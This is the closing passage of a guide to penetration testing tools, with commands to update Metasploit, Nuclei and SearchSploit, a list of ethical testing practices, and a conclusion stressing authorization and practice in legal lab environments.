sudo apt update && sudo apt upgrade -y

# Update Metasploit (on Kali the framework is updated through apt;
# msfupdate applies to installer and git builds)
sudo msfupdate

# Update Nuclei templates
nuclei -update-templates

# Update SearchSploit database
searchsploit -u
```
5. Use Tools Ethically
- Respect scope boundaries
- Avoid denial of service
- Don’t access unnecessary data
- Report findings responsibly
- Follow coordinated disclosure
Conclusion
A comprehensive penetration testing toolkit enables security professionals to effectively assess and improve organizational security. Key takeaways:
- ✅ Choose the right tool: Select tools appropriate for each testing phase
- ✅ Master core tools: Deep expertise beats superficial knowledge of many tools
- ✅ Stay updated: New tools and updates emerge constantly
- ✅ Practice regularly: Maintain proficiency through continuous practice
- ✅ Verify results: Never rely solely on automated tool outputs
- ✅ Document everything: Proper documentation is as important as testing
- ✅ Think ethically: Tools are powerful; use them responsibly
Build expertise with these essential tools through practice in authorized environments like HackTheBox, TryHackMe, and VulnHub. Remember that tools are only as effective as the knowledge and skill of the person wielding them.
Final reminder: Always obtain proper authorization before using any penetration testing tools. The security community’s reputation depends on ethical, authorized testing practices.